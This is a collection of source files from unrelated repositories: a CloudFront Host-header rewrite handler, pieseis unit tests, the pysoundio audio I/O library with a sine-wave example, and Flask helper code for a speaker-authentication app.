request = event['Records'][0]['cf']['request']
originDomain = os.environ['originDomain']
request['headers']['host'][0]['value'] = originDomain;
return request
``` |
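The handler above rewrites the request's `Host` header to the value of the `originDomain` environment variable and returns the modified request; the `event['Records'][0]['cf']['request']` shape is CloudFront's request-event structure. A local invocation sketch, trimmed to the fields the handler touches (module path and domain values are placeholders):

```python
import os

from app import lambda_handler  # module path assumed from the file header above

# Minimal CloudFront request event with only the fields the handler reads and writes.
event = {
    "Records": [
        {
            "cf": {
                "request": {
                    "headers": {
                        "host": [{"key": "Host", "value": "d111111abcdef8.cloudfront.net"}]
                    }
                }
            }
        }
    ]
}

os.environ["originDomain"] = "origin.example.com"  # placeholder origin domain
result = lambda_handler(event, context=None)
assert result["headers"]["host"][0]["value"] == "origin.example.com"
```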
{
"source": "JoeXinfa/pieseis",
"score": 3
} |
#### File: pieseis/tests/property_test.py
```python
import unittest
import sys
sys.path.append('..')
import pieseis.io.jsfile as jsfile
from pieseis.io import properties
from pieseis.tests.config_for_test import TEST_DATASET
class TestFileProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.file_properties = self.js_dataset.file_properties
def tearDown(self):
pass
def test_get_nr_dimensions(self):
self.assertTrue(isinstance(self.file_properties.nr_dimensions, int))
self.assertTrue(self.file_properties.nr_dimensions > 0)
class TestTraceProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.trace_properties = self.js_dataset.trace_properties
def tearDown(self):
pass
def test_get_all_header_names(self):
self.assertTrue(isinstance(self.trace_properties.header_names, list))
self.assertTrue(len(self.trace_properties.header_names) > 0)
def test_get_source_header(self):
self.assertIsInstance(self.trace_properties.header_values('SOURCE'), properties.TraceHeader)
def test_header_is_trace_header_object(self):
source_header = self.trace_properties.header_values('SOURCE')
self.assertIsInstance(source_header.byte_offset, int)
self.assertIsInstance(source_header.element_count, int)
class TestCustomProperties(unittest.TestCase):
def setUp(self):
self.test_dataset = TEST_DATASET
self.js_dataset = jsfile.JavaSeisDataset(self.test_dataset)
self.custom_properties = self.js_dataset.custom_properties
def tearDown(self):
pass
def assert_exists_and_string(self, prop):
self.assertIsNotNone(prop)
self.assertIsInstance(prop, str)
self.assertTrue(len(prop)>0)
def test_is_synthetic(self):
self.assertFalse(self.custom_properties.synthetic)
def test_secondary_key(self):
self.assertIsInstance(self.custom_properties.secondary_key, str)
def test_geometry_matches_flag(self):
self.assertIsInstance(self.custom_properties.geometry_matches_flag, int)
def test_primary_key(self):
self.assert_exists_and_string(self.custom_properties.primary_key)
# TODO: Maybe also check that the value is a VALID header??
def test_primary_sort(self):
self.assert_exists_and_string(self.custom_properties.primary_sort)
def test_trace_no_matches_flag(self):
self.assertIsInstance(self.custom_properties.trace_no_matches_flag, int)
def test_stacked(self):
self.assertIsNotNone(self.custom_properties.stacked)
        self.assertIsInstance(self.custom_properties.stacked, bool)
def test_cookie(self):
self.assertIsNotNone(self.custom_properties.cookie)
self.assertIsInstance(self.custom_properties.cookie, int)
if __name__ == '__main__':
unittest.main()
``` |
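The tests above cover the three property groups a `JavaSeisDataset` exposes (file, trace, and custom properties). A short usage sketch; the dataset path is a placeholder for a real JavaSeis directory:

```python
import pieseis.io.jsfile as jsfile

# The path is a placeholder; point it at a real JavaSeis dataset directory.
dataset = jsfile.JavaSeisDataset("/data/example.js")

print(dataset.file_properties.nr_dimensions)      # e.g. 3 for a 3D volume
print(dataset.trace_properties.header_names[:5])  # first few trace header names
print(dataset.custom_properties.primary_key)      # primary sort key header
```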
{
"source": "joextodd/pysoundio",
"score": 3
} |
#### File: pysoundio/examples/sine.py
```python
import array as ar
import argparse
import math
import time
from pysoundio import (
PySoundIo,
SoundIoFormatFloat32LE,
)
class Player:
def __init__(self, freq=None, backend=None, output_device=None,
sample_rate=None, block_size=None):
self.pysoundio = PySoundIo(backend=backend)
self.freq = float(freq)
self.seconds_offset = 0.0
self.radians_per_second = self.freq * 2.0 * math.pi
self.seconds_per_frame = 1.0 / sample_rate
self.pysoundio.start_output_stream(
device_id=output_device,
channels=1,
sample_rate=sample_rate,
block_size=block_size,
dtype=SoundIoFormatFloat32LE,
write_callback=self.callback
)
def close(self):
self.pysoundio.close()
def callback(self, data, length):
indata = ar.array('f', [0] * length)
for i in range(0, length):
indata[i] = math.sin(
(self.seconds_offset + i * self.seconds_per_frame) * self.radians_per_second)
data[:] = indata.tobytes()
self.seconds_offset += self.seconds_per_frame * length
def get_args():
parser = argparse.ArgumentParser(
description='PySoundIo sine wave output example',
epilog='Play a sine wave over the default output device'
)
parser.add_argument('--freq', default=442.0, help='Note frequency (optional)')
parser.add_argument('--backend', type=int, help='Backend to use (optional)')
parser.add_argument('--blocksize', type=int, default=4096, help='Block size (optional)')
parser.add_argument('--rate', type=int, default=44100, help='Sample rate (optional)')
parser.add_argument('--device', type=int, help='Output device id (optional)')
args = parser.parse_args()
return args
def main():
args = get_args()
player = Player(args.freq, args.backend, args.device, args.rate, args.blocksize)
print('Playing...')
print('CTRL-C to exit')
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print('Exiting...')
player.close()
if __name__ == '__main__':
main()
```
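`Player` keeps `seconds_offset` across callbacks so the sine phase stays continuous from one block to the next. Besides the CLI entry point, the class can be driven directly; a short sketch (tone frequency and duration are arbitrary, and the example above is assumed to be saved as `sine.py`):

```python
import time

from sine import Player  # assumes the example above is saved as sine.py

player = Player(freq=440.0, backend=None, output_device=None,
                sample_rate=44100, block_size=4096)
time.sleep(2)  # let the callback fill blocks for roughly two seconds
player.close()
```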
#### File: pysoundio/pysoundio/pysoundio.py
```python
import logging
import threading
import time
from pysoundio._soundio import ffi as _ffi
from pysoundio._soundio import lib as _lib
from pysoundio import constants
class PySoundIoError(Exception):
pass
class _InputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.input['buffer']
self.callback = parent.input['read_callback']
self.bytes_per_frame = parent.input['bytes_per_frame']
self.daemon = True
self.running = True
self.start()
def run(self):
"""
When there is data ready in the input buffer,
pass it to the user callback.
"""
while self.running:
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.buffer)
if fill_bytes > 0:
read_buf = _lib.soundio_ring_buffer_read_ptr(self.buffer)
data = bytearray(fill_bytes)
_ffi.memmove(data, read_buf, fill_bytes)
if self.callback:
self.callback(data=data, length=int(fill_bytes / self.bytes_per_frame))
_lib.soundio_ring_buffer_advance_read_ptr(self.buffer, fill_bytes)
time.sleep(0.001)
def stop(self):
self.running = False
class _OutputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.output['buffer']
self.callback = parent.output['write_callback']
self.bytes_per_frame = parent.output['bytes_per_frame']
self.sample_rate = parent.output['sample_rate']
self.block_size = parent.output['block_size']
self.to_read = 0
self.running = True
self.daemon = True
self.start()
def run(self):
"""
Request output data from user callback when there is
free space in the buffer.
"""
while self.running:
if self.to_read > 0:
data = bytearray(self.block_size * self.bytes_per_frame)
free_bytes = _lib.soundio_ring_buffer_free_count(self.buffer)
if free_bytes > len(data):
if self.callback:
self.callback(data=data, length=self.block_size)
write_buf = _lib.soundio_ring_buffer_write_ptr(self.buffer)
_ffi.memmove(write_buf, data, len(data))
_lib.soundio_ring_buffer_advance_write_ptr(self.buffer, len(data))
with threading.Lock():
self.to_read -= 1
time.sleep(0.001)
def stop(self):
self.running = False
class PySoundIo:
def __init__(self, backend=None):
"""
Initialise PySoundIo.
Connect to a specific backend, or the default.
Parameters
----------
backend: (SoundIoBackend) see `Backends`_. (optional)
"""
self.backend = backend
self.input = {'device': None, 'stream': None, 'buffer': None, 'read_callback': None, 'thread': None}
self.output = {'device': None, 'stream': None, 'buffer': None, 'write_callback': None, 'thread': None}
self.logger = logging.getLogger(__name__)
self._soundio = _lib.soundio_create()
if not self._soundio:
raise PySoundIoError('Out of memory')
if backend:
self._check(_lib.soundio_connect_backend(self._soundio, backend))
else:
self._check(_lib.soundio_connect(self._soundio))
self._userdata = _ffi.new_handle(self)
self.flush()
def close(self):
"""
Clean up allocated memory
Close libsoundio connections
"""
self.logger.info('Closing down threads...')
if self.input['thread']:
self.input['thread'].stop()
while self.input['thread'].is_alive():
time.sleep(0.001)
if self.output['thread']:
self.output['thread'].stop()
while self.output['thread'].is_alive():
time.sleep(0.001)
self.logger.info('Closing down streams...')
if self.input['stream']:
_lib.soundio_instream_destroy(self.input['stream'])
del self.input['stream']
if self.output['stream']:
_lib.soundio_outstream_destroy(self.output['stream'])
del self.output['stream']
if self.input['buffer']:
_lib.soundio_ring_buffer_destroy(self.input['buffer'])
del self.input['buffer']
if self.output['buffer']:
_lib.soundio_ring_buffer_destroy(self.output['buffer'])
del self.output['buffer']
if self.input['device']:
_lib.soundio_device_unref(self.input['device'])
del self.input['device']
if self.output['device']:
_lib.soundio_device_unref(self.output['device'])
del self.output['device']
if self._soundio:
_lib.soundio_disconnect(self._soundio)
_lib.soundio_destroy(self._soundio)
del self._soundio
def flush(self):
"""
Atomically update information for all connected devices.
"""
_lib.soundio_flush_events(self._soundio)
@property
def version(self):
"""
Returns the current version of libsoundio
"""
return _ffi.string(_lib.soundio_version_string()).decode()
def _check(self, code):
"""
Returns an error message associated with the return code
"""
if code != _lib.SoundIoErrorNone:
raise PySoundIoError(_ffi.string(_lib.soundio_strerror(code)).decode())
@property
def backend_count(self):
"""
Returns the number of available backends.
"""
return _lib.soundio_backend_count(self._soundio)
def get_default_input_device(self):
"""
Returns default input device
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if the input device is not available
"""
device_id = _lib.soundio_default_input_device_index(self._soundio)
return self.get_input_device(device_id)
def get_input_device(self, device_id):
"""
Return an input device by index
Parameters
----------
device_id: (int) input device index
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_input_device_count(self._soundio):
raise PySoundIoError('Invalid input device id')
self.input['device'] = _lib.soundio_get_input_device(self._soundio, device_id)
return self.input['device']
def get_default_output_device(self):
"""
Returns default output device
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if the output device is not available
"""
device_id = _lib.soundio_default_output_device_index(self._soundio)
return self.get_output_device(device_id)
def get_output_device(self, device_id):
"""
Return an output device by index
Parameters
----------
device_id: (int) output device index
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_output_device_count(self._soundio):
raise PySoundIoError('Invalid output device id')
self.output['device'] = _lib.soundio_get_output_device(self._soundio, device_id)
return self.output['device']
def list_devices(self):
"""
Return a list of available devices
Returns
-------
(list)(dict) containing information on available input / output devices.
"""
output_count = _lib.soundio_output_device_count(self._soundio)
input_count = _lib.soundio_input_device_count(self._soundio)
default_output = _lib.soundio_default_output_device_index(self._soundio)
default_input = _lib.soundio_default_input_device_index(self._soundio)
input_devices = []
output_devices = []
for i in range(0, input_count):
device = _lib.soundio_get_input_device(self._soundio, i)
input_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_input == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
for i in range(0, output_count):
device = _lib.soundio_get_output_device(self._soundio, i)
output_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_output == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
self.logger.info('%d devices found' % (input_count + output_count))
return (input_devices, output_devices)
def get_layouts(self, device):
"""
Return a list of available layouts for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available channel layouts for a device
"""
current = device.current_layout
layouts = {
'current': {
'name': _ffi.string(current.name).decode() if current.name else 'None'
},
'available': []
}
for idx in range(0, device.layout_count):
layouts['available'].append({
'name': (_ffi.string(device.layouts[idx].name).decode() if
device.layouts[idx].name else 'None'),
'channel_count': device.layouts[idx].channel_count
})
return layouts
def get_sample_rates(self, device):
"""
Return a list of available sample rates for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available sample rates for a device
"""
sample_rates = {'current': device.sample_rate_current, 'available': []}
for s in range(0, device.sample_rate_count):
sample_rates['available'].append({
'min': device.sample_rates[s].min,
'max': device.sample_rates[s].max
})
return sample_rates
def get_formats(self, device):
"""
Return a list of available formats for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available formats for a device
"""
formats = {'current': device.current_format, 'available': []}
for r in range(0, device.format_count):
formats['available'].append(constants.FORMATS[device.formats[r]])
return formats
def supports_sample_rate(self, device, rate):
"""
Check the sample rate is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
rate (int): sample rate
Returns
-------
(bool) True if sample rate is supported for this device
"""
return bool(_lib.soundio_device_supports_sample_rate(device, rate))
def get_default_sample_rate(self, device):
"""
Get the best sample rate.
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(int) The best available sample rate
"""
sample_rate = None
for rate in constants.PRIORITISED_SAMPLE_RATES:
if self.supports_sample_rate(device, rate):
sample_rate = rate
break
if not sample_rate:
sample_rate = device.sample_rates.max
return sample_rate
def supports_format(self, device, format):
"""
Check the format is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
format: (SoundIoFormat) see `Formats`_.
Returns
-------
(bool) True if the format is supported for this device
"""
return bool(_lib.soundio_device_supports_format(device, format))
def get_default_format(self, device):
"""
Get the best format value.
Parameters
----------
device: (SoundIoDevice) device object
Returns
------
(SoundIoFormat) The best available format
"""
dtype = _lib.SoundIoFormatInvalid
for fmt in constants.PRIORITISED_FORMATS:
if self.supports_format(device, fmt):
dtype = fmt
break
if dtype == _lib.SoundIoFormatInvalid:
raise PySoundIoError('Incompatible sample formats')
return dtype
def sort_channel_layouts(self, device):
"""
Sorts channel layouts by channel count, descending
Parameters
----------
device: (SoundIoDevice) device object
"""
_lib.soundio_device_sort_channel_layouts(device)
def _get_default_layout(self, channels):
"""
Get default builtin channel layout for the given number of channels
Parameters
----------
channel_count: (int) desired number of channels
"""
return _lib.soundio_channel_layout_get_default(channels)
def get_bytes_per_frame(self, format, channels):
"""
Get the number of bytes per frame
Parameters
----------
format: (SoundIoFormat) format
channels: (int) number of channels
Returns
-------
(int) number of bytes per frame
"""
return _lib.soundio_get_bytes_per_sample(format) * channels
def get_bytes_per_sample(self, format):
"""
Get the number of bytes per sample
Parameters
----------
format: (SoundIoFormat) format
Returns
-------
(int) number of bytes per sample
"""
return _lib.soundio_get_bytes_per_sample(format)
def get_bytes_per_second(self, format, channels, sample_rate):
"""
Get the number of bytes per second
Parameters
----------
format: (SoundIoFormat) format
channels (int) number of channels
sample_rate (int) sample rate
Returns
-------
(int) number of bytes per second
"""
return self.get_bytes_per_frame(format, channels) * sample_rate
def _create_input_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.input['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.input['buffer']
def _create_output_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.output['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.output['buffer']
def _create_input_stream(self):
"""
Allocates memory and sets defaults for input stream
"""
self.input['stream'] = _lib.soundio_instream_create(self.input['device'])
if not self.input['stream']:
raise PySoundIoError('Out of memory')
self.input['stream'].userdata = self._userdata
self.input['stream'].read_callback = _lib._read_callback
self.input['stream'].overflow_callback = _lib._overflow_callback
self.input['stream'].error_callback = _lib._input_error_callback
layout = self._get_default_layout(self.input['channels'])
if layout:
self.input['stream'].layout = layout[0]
else:
raise RuntimeError('Failed to find a channel layout for %d channels' % self.input['channels'])
self.input['stream'].format = self.input['format']
self.input['stream'].sample_rate = self.input['sample_rate']
if self.input['block_size']:
self.input['stream'].software_latency = float(self.input['block_size']) / self.input['sample_rate']
return self.input['stream']
def _open_input_stream(self):
"""
Open an input stream.
"""
self._check(_lib.soundio_instream_open(self.input['stream']))
def _start_input_stream(self):
"""
Start an input stream running.
"""
self._check(_lib.soundio_instream_start(self.input['stream']))
def pause_input_stream(self, pause):
"""
Pause input stream
Parameters
----------
pause: (bool) True to pause, False to unpause
"""
self._check(_lib.soundio_instream_pause(self.input['stream'], pause))
def get_input_latency(self, out_latency):
"""
Obtain the number of seconds that the next frame of sound
being captured will take to arrive in the buffer,
plus the amount of time that is represented in the buffer.
Parameters
----------
out_latency: (float) output latency in seconds
"""
c_latency = _ffi.new('double *', out_latency)
return _lib.soundio_instream_get_latency(self.input['stream'], c_latency)
def start_input_stream(self, device_id=None,
sample_rate=None, dtype=None,
block_size=None, channels=None,
read_callback=None, overflow_callback=None):
"""
Creates input stream, and sets parameters. Then allocates
a ring buffer and starts the stream.
The read callback is called in an audio processing thread,
when a block of data is read from the microphone. Data is
passed from the ring buffer to the callback to process.
Parameters
----------
device_id: (int) input device id
sample_rate: (int) desired sample rate (optional)
dtype: (SoundIoFormat) desired format, see `Formats`_. (optional)
block_size: (int) desired block size (optional)
channels: (int) number of channels [1: mono, 2: stereo] (optional)
read_callback: (fn) function to call with data, the function must have
the arguments data and length. See record example
overflow_callback: (fn) function to call if data is not being read fast enough
Raises
------
PySoundIoError if any invalid parameters are used
Notes
-----
An example read callback
.. code-block:: python
:linenos:
# Note: `length` is the number of samples per channel
def read_callback(data: bytearray, length: int):
wav.write(data)
Overflow callback example
.. code-block:: python
:linenos:
def overflow_callback():
print('buffer overflow')
"""
self.input['sample_rate'] = sample_rate
self.input['format'] = dtype
self.input['block_size'] = block_size
self.input['channels'] = channels
self.input['read_callback'] = read_callback
self.input['overflow_callback'] = overflow_callback
if device_id is not None:
self.input['device'] = self.get_input_device(device_id)
else:
self.input['device'] = self.get_default_input_device()
self.logger.info('Input Device: %s' % _ffi.string(self.input['device'].name).decode())
self.sort_channel_layouts(self.input['device'])
if self.input['sample_rate']:
if not self.supports_sample_rate(self.input['device'], self.input['sample_rate']):
raise PySoundIoError('Invalid sample rate: %d' % self.input['sample_rate'])
else:
self.input['sample_rate'] = self.get_default_sample_rate(self.input['device'])
if self.input['format']:
if not self.supports_format(self.input['device'], self.input['format']):
raise PySoundIoError('Invalid format: %s interleaved' %
(_ffi.string(_lib.soundio_format_string(self.input['format'])).decode()))
else:
self.input['format'] = self.get_default_format(self.input['device'])
self._create_input_stream()
self._open_input_stream()
self.input['bytes_per_frame'] = self.get_bytes_per_frame(self.input['format'], channels)
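        # Capacity = DEFAULT_RING_BUFFER_DURATION (30 seconds, per the ring buffer docstrings)
        # * sample rate * bytes per frame, e.g. 30 * 44100 * 8 bytes for float32 stereo.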
capacity = int(constants.DEFAULT_RING_BUFFER_DURATION *
self.input['stream'].sample_rate * self.input['bytes_per_frame'])
self._create_input_ring_buffer(capacity)
if self.input['stream'].layout_error:
raise RuntimeError('Layout error')
layout_name = _ffi.string(self.input['stream'].layout.name).decode()
self.logger.info('Created input stream with a %s layout', layout_name)
self.input['thread'] = _InputProcessingThread(parent=self)
self._start_input_stream()
self.flush()
def _create_output_stream(self):
"""
Allocates memory and sets defaults for output stream
"""
self.output['stream'] = _lib.soundio_outstream_create(self.output['device'])
if not self.output['stream']:
raise PySoundIoError('Out of memory')
self.output['stream'].userdata = self._userdata
self.output['stream'].write_callback = _lib._write_callback
self.output['stream'].underflow_callback = _lib._underflow_callback
self.output['stream'].error_callback = _lib._output_error_callback
layout = self._get_default_layout(self.output['channels'])
if layout:
self.output['stream'].layout = layout[0]
else:
raise RuntimeError('Failed to find a channel layout for %d channels' % self.output['channels'])
self.output['stream'].format = self.output['format']
self.output['stream'].sample_rate = self.output['sample_rate']
if self.output['block_size']:
self.output['stream'].software_latency = float(self.output['block_size']) / self.output['sample_rate']
return self.output['stream']
def _open_output_stream(self):
"""
Open an output stream.
"""
self._check(_lib.soundio_outstream_open(self.output['stream']))
self.output['block_size'] = int(self.output['stream'].software_latency * self.output['sample_rate'])
def _start_output_stream(self):
"""
Start an output stream running.
"""
self._check(_lib.soundio_outstream_start(self.output['stream']))
def pause_output_stream(self, pause):
"""
Pause output stream
Parameters
----------
pause: (bool) True to pause, False to unpause
"""
self._check(_lib.soundio_outstream_pause(self.output['stream'], pause))
def _clear_output_buffer(self):
"""
Clear the output buffer
"""
if self.output['buffer']:
_lib.soundio_ring_buffer_clear(self.output['buffer'])
def get_output_latency(self, out_latency):
"""
Obtain the total number of seconds that the next frame written
will take to become audible.
Parameters
----------
out_latency: (float) output latency in seconds
"""
c_latency = _ffi.new('double *', out_latency)
return _lib.soundio_outstream_get_latency(self.output['stream'], c_latency)
def start_output_stream(self, device_id=None,
sample_rate=None, dtype=None,
block_size=None, channels=None,
write_callback=None, underflow_callback=None):
"""
Creates output stream, and sets parameters. Then allocates
a ring buffer and starts the stream.
The write callback is called in an audio processing thread,
when a block of data should be passed to the speakers. Data is
added to the ring buffer to process.
Parameters
----------
device_id: (int) output device id
sample_rate: (int) desired sample rate (optional)
dtype: (SoundIoFormat) desired format, see `Formats`_. (optional)
block_size: (int) desired block size (optional)
channels: (int) number of channels [1: mono, 2: stereo] (optional)
write_callback: (fn) function to call with data, the function must have
the arguments data and length.
underflow_callback: (fn) function to call if data is not being written fast enough
Raises
------
PySoundIoError if any invalid parameters are used
Notes
-----
An example write callback
.. code-block:: python
:linenos:
# Note: `length` is the number of samples per channel
def write_callback(data: bytearray, length: int):
outdata = ar.array('f', [0] * length)
for i in range(length):
outdata[i] = 1.0
data[:] = outdata.tobytes()
Underflow callback example
.. code-block:: python
:linenos:
def underflow_callback():
print('buffer underflow')
"""
self.output['sample_rate'] = sample_rate
self.output['format'] = dtype
self.output['block_size'] = block_size
self.output['channels'] = channels
self.output['write_callback'] = write_callback
self.output['underflow_callback'] = underflow_callback
if device_id is not None:
self.output['device'] = self.get_output_device(device_id)
else:
self.output['device'] = self.get_default_output_device()
self.logger.info('Output Device: %s' % _ffi.string(self.output['device'].name).decode())
self.sort_channel_layouts(self.output['device'])
if self.output['sample_rate']:
if not self.supports_sample_rate(self.output['device'], self.output['sample_rate']):
raise PySoundIoError('Invalid sample rate: %d' % self.output['sample_rate'])
else:
self.output['sample_rate'] = self.get_default_sample_rate(self.output['device'])
if self.output['format']:
if not self.supports_format(self.output['device'], self.output['format']):
raise PySoundIoError('Invalid format: %s interleaved' %
(_ffi.string(_lib.soundio_format_string(self.output['format'])).decode()))
else:
self.output['format'] = self.get_default_format(self.output['device'])
self._create_output_stream()
self._open_output_stream()
self.output['bytes_per_frame'] = self.get_bytes_per_frame(self.output['format'], channels)
capacity = int(constants.DEFAULT_RING_BUFFER_DURATION *
self.output['stream'].sample_rate * self.output['bytes_per_frame'])
self._create_output_ring_buffer(capacity)
self._clear_output_buffer()
if self.output['stream'].layout_error:
raise RuntimeError('Layout error')
layout_name = _ffi.string(self.output['stream'].layout.name).decode()
self.logger.info('Created output stream with a %s layout', layout_name)
self.output['thread'] = _OutputProcessingThread(parent=self)
self._start_output_stream()
self.flush()
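# A matching usage sketch for the output API (same caveats as the input
# sketch above; `tone_bytes` would be pre-rendered audio and is assumed):
#
#     def write_callback(data, length):
#         data[:] = tone_bytes[:len(data)]
#
#     pysoundio.start_output_stream(sample_rate=44100,
#                                   dtype=soundio.SoundIoFormatFloat32LE,
#                                   channels=1,
#                                   write_callback=write_callback)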
@_ffi.def_extern()
def _write_callback(output_stream,
frame_count_min,
frame_count_max):
"""
Called internally when the output requires some data
"""
self = _ffi.from_handle(output_stream.userdata)
frame_count = 0
read_ptr = _lib.soundio_ring_buffer_read_ptr(self.output['buffer'])
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.output['buffer'])
fill_count = fill_bytes / output_stream.bytes_per_frame
read_count = min(frame_count_max, fill_count)
frames_left = read_count
if frame_count_min > fill_count:
frames_left = frame_count_min
while frames_left > 0:
frame_count = frames_left
if frame_count <= 0:
return
frame_count_ptr = _ffi.new('int *', frame_count)
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_outstream_begin_write(output_stream,
areas_ptr,
frame_count_ptr)
)
if frame_count_ptr[0] <= 0:
return
num_bytes = output_stream.bytes_per_sample * output_stream.layout.channel_count * frame_count_ptr[0]
fill_bytes = bytearray(b'\x00' * num_bytes)
_ffi.memmove(areas_ptr[0][0].ptr, fill_bytes, num_bytes)
self._check(_lib.soundio_outstream_end_write(output_stream))
frames_left -= frame_count_ptr[0]
while frames_left > 0:
frame_count = int(frames_left)
frame_count_ptr = _ffi.new('int *', frame_count)
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_outstream_begin_write(output_stream, areas_ptr, frame_count_ptr)
)
if frame_count_ptr[0] <= 0:
break
num_bytes = output_stream.bytes_per_sample * output_stream.layout.channel_count * frame_count_ptr[0]
_ffi.memmove(areas_ptr[0][0].ptr, read_ptr, num_bytes)
read_ptr += num_bytes
self._check(_lib.soundio_outstream_end_write(output_stream))
frames_left -= frame_count_ptr[0]
_lib.soundio_ring_buffer_advance_read_ptr(
self.output['buffer'],
int(read_count * output_stream.bytes_per_frame)
)
with threading.Lock():
self.output['thread'].block_size = frame_count_max
self.output['thread'].to_read += 1
@_ffi.def_extern()
def _underflow_callback(output_stream):
"""
Called internally when the sound device runs out of
buffered audio data to play.
"""
logger = logging.getLogger(__name__)
logger.error('Output underflow')
self = _ffi.from_handle(output_stream.userdata)
if self.output['underflow_callback']:
self.output['underflow_callback']()
@_ffi.def_extern()
def _output_error_callback(output_stream,
error_code):
"""
Called internally when an error occurs in the
output stream.
"""
logger = logging.getLogger(__name__)
logger.error(_ffi.string(_lib.soundio_strerror(error_code)).decode())
@_ffi.def_extern()
def _read_callback(input_stream,
frame_count_min,
frame_count_max):
"""
Called internally when there is input data available.
"""
self = _ffi.from_handle(input_stream.userdata)
write_ptr = _lib.soundio_ring_buffer_write_ptr(self.input['buffer'])
free_bytes = _lib.soundio_ring_buffer_free_count(self.input['buffer'])
free_count = free_bytes / input_stream.bytes_per_frame
if free_count < frame_count_min:
logger = logging.getLogger(__name__)
logger.critical('Ring buffer overflow')
write_frames = min(free_count, frame_count_max)
frames_left = write_frames
while True:
frame_count = frames_left
frame_count_ptr = _ffi.new('int *', int(frame_count))
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_instream_begin_read(input_stream,
areas_ptr,
frame_count_ptr)
)
if not frame_count_ptr[0]:
break
if not areas_ptr[0]:
# Due to an overflow there is a hole.
# Fill the ring buffer with silence for the size of the hole.
fill = bytearray(b'\x00' * frame_count_ptr[0] * input_stream.bytes_per_frame)
_ffi.memmove(write_ptr, fill, len(fill))
else:
num_bytes = input_stream.bytes_per_sample * input_stream.layout.channel_count * frame_count_ptr[0]
_ffi.memmove(write_ptr, areas_ptr[0][0].ptr, num_bytes)
write_ptr += num_bytes
self._check(_lib.soundio_instream_end_read(input_stream))
frames_left -= frame_count_ptr[0]
if frames_left <= 0:
break
advance_bytes = int(write_frames * input_stream.bytes_per_frame)
_lib.soundio_ring_buffer_advance_write_ptr(self.input['buffer'], advance_bytes)
@_ffi.def_extern()
def _overflow_callback(input_stream):
"""
Called internally when the sound device buffer is full,
yet there is more captured audio to put in it.
"""
logger = logging.getLogger(__name__)
logger.error('Input overflow')
self = _ffi.from_handle(input_stream.userdata)
if self.input['overflow_callback']:
self.input['overflow_callback']()
@_ffi.def_extern()
def _input_error_callback(input_stream,
error_code):
"""
Called internally when an error occurs in the
input stream.
"""
logger = logging.getLogger(__name__)
logger.error(_ffi.string(_lib.soundio_strerror(error_code)).decode())
``` |
{
"source": "joexu01/speak_auth",
"score": 3
} |
#### File: speak_auth/app/assist_func.py
```python
import random
import time
# Generate a random string
def random_string(length=32):
base_str = 'qwertyuiopasdfghjklzxcvbnm0123456789'
return ''.join(random.choice(base_str) for i in range(length))
def random_dtw_number(length=6):
base_str = '0123456789'
return ''.join(random.choice(base_str) for i in range(length))
# Generate a time string
def time_string():
return time.asctime(time.localtime(time.time()))
```
#### File: Project/speak_auth/speak_auth.py
```python
import os
# Flask and Flask-related third-party libraries
from flask_migrate import Migrate
# Local Flask application modules
from app import create_app, db
from app.models import User, Role, Person, LoginRecord
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
migrate = Migrate(app, db)
@app.shell_context_processor
def make_shell_context():
""" Shell 字典"""
return dict(db=db, User=User, Role=Role, Person=Person, LoginRecord=LoginRecord)
@app.cli.command()
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8001)
```
#### File: Test Code/speak_reg/GMM_01.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import matplotlib.pyplot as plt
import numpy as np
from sklearn.model_selection import cross_val_score
import io
